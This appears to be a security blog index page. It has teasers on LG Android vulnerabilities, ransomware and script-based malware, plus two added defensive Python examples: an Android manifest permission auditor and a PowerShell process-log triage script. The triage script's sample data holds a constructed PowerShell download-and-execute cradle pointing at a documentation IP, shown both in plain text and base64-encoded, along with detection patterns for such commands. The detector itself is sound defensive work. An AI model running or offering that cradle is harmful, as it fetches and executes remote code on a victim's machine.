OEMs Have Flaws Too: Exposing Two New LG Vulnerabilities

At the LayerOne 2016 conference in Los Angeles, Check Point disclosed today two vulnerabilities (CVE-2016-3117, CVE-2016-2035) that can be used to elevate privileges on LG mobile devices and to attack them remotely. Check Point reported both vulnerabilities to LG before disclosing them publicly, and LG has issued fixes for both. The vulnerabilities are unique to LG devices, which account for over 20% of the Android OEM market in the US according to a 2016 survey. The first vulnerability allows a malicious app installed on an LG device to abuse the lack of a bind permission on an LG service and so elevate its privileges, gaining additional control of the device. The second vulnerability ...
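The first vulnerability comes down to a service reachable from other apps without a bind permission, which is something a manifest review can catch before a device ships. The following is an added illustration, not Check Point's or LG's code: a small Python audit over an AndroidManifest.xml that flags services other apps can bind to or start without holding a permission, or that are guarded only by a permission any app can request. The package, service and permission names in the embedded manifest are constructed for the example.

```python
"""Audit an AndroidManifest.xml for services other apps can reach unguarded.

Added example for the bug class above (an exported service with no bind
permission); not Check Point's or LG's code. Package, service and
permission names in SAMPLE_MANIFEST are constructed for illustration.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest: two unguarded services, one weakly guarded, one
# guarded by a signature permission, one not exported at all.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.oemsvc">
  <permission android:name="com.example.oemsvc.BIND_STRONG"
              android:protectionLevel="signature"/>
  <permission android:name="com.example.oemsvc.BIND_WEAK"
              android:protectionLevel="normal"/>
  <application android:label="Sample OEM services">
    <service android:name=".OpenService" android:exported="true"/>
    <service android:name=".ImplicitService">
      <intent-filter>
        <action android:name="com.example.oemsvc.action.DO_WORK"/>
      </intent-filter>
    </service>
    <service android:name=".WeaklyGuardedService" android:exported="true"
             android:permission="com.example.oemsvc.BIND_WEAK"/>
    <service android:name=".GuardedService" android:exported="true"
             android:permission="com.example.oemsvc.BIND_STRONG"/>
    <service android:name=".InternalService" android:exported="false"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an android:-namespaced attribute, or None if it is absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def audit_services(manifest_xml):
    """Return (service name, reason) for every service that another app can
    bind to or start without holding a signature-level permission.

    Reachable: android:exported="true", or an <intent-filter> present with
    no android:exported attribute (exported by default before Android 12).
    Guard: android:permission on the <service>, else the <application>-wide
    android:permission. A permission this manifest declares with
    protectionLevel "normal" or "dangerous" counts as weak, because any
    app can request it; permissions declared elsewhere (e.g. by the
    platform) are not judged here.
    """
    root = ET.fromstring(manifest_xml)
    declared = {
        _attr(p, "name"): (_attr(p, "protectionLevel") or "normal")
        for p in root.iter("permission")
    }
    app = root.find("application")
    app_perm = _attr(app, "permission") if app is not None else None

    findings = []
    for svc in root.iter("service"):
        name = _attr(svc, "name")
        exported = _attr(svc, "exported")
        has_filter = svc.find("intent-filter") is not None
        reachable = exported == "true" or (exported is None and has_filter)
        if not reachable:
            continue
        perm = _attr(svc, "permission") or app_perm
        if perm is None:
            findings.append((name, "reachable by any app, no permission required"))
        elif declared.get(perm) in ("normal", "dangerous"):
            findings.append((name, "guarded only by %s (protectionLevel %s)"
                             % (perm, declared[perm])))
    return findings


if __name__ == "__main__":
    for name, reason in audit_services(SAMPLE_MANIFEST):
        print("%-24s %s" % (name, reason))
```

Run against a real APK by feeding it the decoded manifest (for instance the output of `aapt dump xmltree` converted back to XML, or apktool's `AndroidManifest.xml`); the check is deliberately conservative and says nothing about permissions it cannot see declared.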

Check Point Named a Leader in the 2016 Gartner Magic Quadrant for Enterprise Network Firewalls

Today’s enterprise networks are more complex than ever. Cloud computing, floods of connected devices and highly mobile workforces put enormous pressure on security teams to keep networks and data protected. At the same time, the tools and techniques cybercriminals use to target enterprise data continue to evolve rapidly. When reflecting on the state of enterprise security, I often quote the philosopher Heraclitus, who said it best: “The only thing that is constant is change.” This raises the question: why is the firewall still part of the network security discussion? Some in the security industry view the firewall as antiquated technology. After all, the ...

Attacks on SMB are a sure thing, according to the latest Verizon report

It’s not surprising that small businesses are far more vulnerable to cyberattacks than large enterprises. The 2016 Data Breach Investigations Report, to which Check Point contributed, reveals just how much. The report covers a large number of SMBs: of 521 small businesses surveyed, 447 confirmed a security breach with data loss in 2015, a breach rate of roughly 86%. Enterprise security breaches tell a different story: of 47,408 enterprises, only 312 (about 0.7%) experienced such breaches. This is no coincidence. Compared to SMBs, enterprises are far more aware of and prepared for cyberattacks. They implement various security measures and ...

CryptXXX Ransomware: Simple, Evasive, Effective

CryptXXX emerged a few weeks ago and it has been sneaky. Its most impressive feature is the simplicity of its evasion techniques, which give it an advantage over most security systems. The result is a very low detection rate for new samples and a high success rate for the malware. Judging by its decryption messages and its deployment method (both CryptXXX and TeslaCrypt are delivered by the Angler Exploit Kit), CryptXXX seems very similar to TeslaCrypt, but the two differ in essence.
Figure 1: CryptXXX HTML message
Figure 2: TeslaCrypt ransom note
Figure 3: CryptXXX ransom note, containing the same text
Whether or not the developers are related, they have learned a ...

Spam-Riding Dropper Packs a One-Two Ransomware, Adware Punch

The Most Trusty Attack Vector
Shady random strangers on the internet often have an uncanny ability to make you believe you should have expected to hear from them. You may be savvy enough to brush off the ‘Nigerian Prince in Distress’ and the ‘Thousands of Hot Singles in Your Area Waiting to Meet You’, but what about your invitation to stand trial, or the outstanding fine that you owe? Do you brush those off with the same knowing smirk, or is there an opening there that could catch you off guard? If your honest answer contains a little bit of column B, you are not alone. Social engineering attacks enjoy a natural advantage against most kinds of security mechanisms. It must ...

Weaponized WordPress Tools

WordPress is a free, open source content management system (CMS) for creating websites, and is considered the most popular blogging system in use. WordPress' appeal to website developers stems from its free plugins and themes, which are easily installed on top of the basic platform. These add-ons let WordPress users personalize and expand their websites and blogs. There are currently over 60 million WordPress websites worldwide.
Why Target WordPress?
The availability of the platform’s code and its popularity make WordPress sites appealing targets for hacking and exploitation. In the past year we have seen many WordPress attacks. One example is the April 2016 ...

Hack In The Box: Malware Disguises Itself To Infiltrate Your Device

No user would knowingly allow malware onto a mobile device, so it’s obvious why malicious apps disguise themselves to trick users into inviting them in. In many cases the malware tries to persuade the user to go even further by requesting permissions that enable its malicious actions. Malware tries to do as much damage as possible, and one strategy attackers use is repackaging well-known, popular apps. The repackaged apps usually keep their original functionality but add malicious components. The fake copy has an almost identical name to the original app and seemingly authentic icons, screenshots, and even user reviews. These components can vary in ...

TeslaCrypt Ransomware Shuts Down: One Down, Plenty to Go

In a surprising turn of events, the creators of the notorious TeslaCrypt ransomware have shut down their operation and released the master key for decrypting all files. They even said they are sorry, as shown in the image below.
Figure 1: TeslaCrypt shut-down message
The motive behind this step remains unclear. The attackers could be trying to lower their profile to avoid law enforcement agencies, or they could genuinely regret the damage they have done. Either way, the users who were infected by TeslaCrypt have already paid the price. As we reported earlier, TeslaCrypt, which emerged in 2015, was known especially for its ability to adapt. Several versions of it ...

The Scripting Threat: How Admin Tools Became Dominant in the Malware Attack Lifecycle

Malware has increasingly adopted scripting as a major technique, replacing file-based execution (dropping and running a binary). The shift took place mainly to avoid the signature-based detection employed by many security vendors. To understand how this works, one must first understand what scripting really is. Scripts are programs that automate tasks which a human operator could otherwise carry out by hand. Scripting languages such as PowerShell and VBScript were created to provide flexible capabilities adaptable to different needs, and they are used mainly by administrators. Activities such as reconnaissance of the victim, lateral movement, C&C communication and persistence are very ...
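As an added example (not code from the original post, and not Check Point's detection logic), here is how the signature-evasion point plays out on the defender's side: rather than matching a file hash, the script below scores process-creation records for the traits that distinguish malicious use of an admin scripting host, such as a launch from a mail or document client, an encoded or in-memory command line, and a download cradle. The records, hostnames and paths are constructed for the example. PowerShell's -EncodedCommand takes the base64 of a UTF-16LE string, which the decoder reverses so that indicators hidden inside the payload are scored as well.

```python
"""Triage process-creation records for malicious script-host use.

Added example, not Check Point's detection logic. Records are constructed
(parent image, image, command line); hostnames and paths are made up and
203.0.113.0/24 is a documentation address range.
"""
import base64
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# -EncodedCommand (and its short forms) takes base64 of a UTF-16LE string.
ENC_FLAG = re.compile(r"(?<!\w)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Each indicator counts once per record, however many times it appears.
INDICATORS = [
    ("download cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)),
    ("in-memory execution", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("window/policy evasion", re.compile(
        r"-(?:w|win|windowstyle)\s+hidden|-(?:ep|exec|executionpolicy)\s+bypass", re.I)),
    ("script in temp directory", re.compile(r"\\temp\\\S+\.(?:vbs|vbe|js|jse|hta|ps1)\b", re.I)),
]

# Constructed stage-2 one-liner, encoded the way PowerShell expects it.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage2.ps1')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16le")).decode("ascii")

# Constructed records: (parent image, image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe", "powershell.exe -NoProfile -Command Get-Date"),
    ("winword.exe", "powershell.exe",
     "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand " + ENCODED),
    ("cmd.exe", "powershell.exe",
     "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')\""),
    ("outlook.exe", "wscript.exe",
     "wscript.exe //B C:\\Users\\bob\\AppData\\Local\\Temp\\invoice.vbs"),
    ("services.exe", "powershell.exe",
     "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1"),
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(parent, image, cmdline):
    """Score one record. Returns (score, [reason, ...]); non-script hosts score 0."""
    if image.lower() not in SCRIPT_HOSTS:
        return 0, []
    reasons = []                      # (label, weight)
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append(("encoded command", 1))
        text = cmdline + " " + decoded   # match indicators inside the payload too
    for label, pattern in INDICATORS:
        if pattern.search(text):
            reasons.append((label, 1))
    if parent.lower() in OFFICE_PARENTS:
        # A document or mail client spawning a script host is the classic
        # macro/attachment dropper shape, so it weighs more than one flag.
        reasons.append(("spawned by " + parent.lower(), 2))
    return sum(w for _, w in reasons), [label for label, _ in reasons]


def triage(events, threshold=2):
    """Return [(cmdline, score, reasons)] for records scoring at or above threshold."""
    hits = []
    for parent, image, cmdline in events:
        score, reasons = score_event(parent, image, cmdline)
        if score >= threshold:
            hits.append((cmdline, score, reasons))
    return hits


if __name__ == "__main__":
    for cmdline, score, reasons in triage(SAMPLE_EVENTS):
        print("score %d: %s\n    %s" % (score, ", ".join(reasons), cmdline))
```

Each indicator counts once per record and a document-client parent counts double, so a lone -NoProfile launched from Explorer scores 0 while a bare IEX download cradle from cmd.exe reaches the default threshold of 2; tune the weights and the parent list against a baseline of your own administrators' PowerShell use, since that is exactly the traffic this technique hides in.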

In The Wild: Malware in Google Play is as Prevalent and Pesky as Ever

Not a week passes without new malware being found on Google Play, and this week was no different. Among the malware found are both new and old samples, including a known malicious banker and a new type of malware making its first appearance on Google Play. Google has also patched more vulnerabilities, which is no coincidence: frequent security patches and malware discoveries have become the norm because of the frail security Android provides.
Using Wi-Fi to Hack Into Your Device
Among the various security patches recently released by Google, one in particular catches the eye. The vulnerability allowed attackers to elevate privileges or even to target a device with a Denial-of-Service ...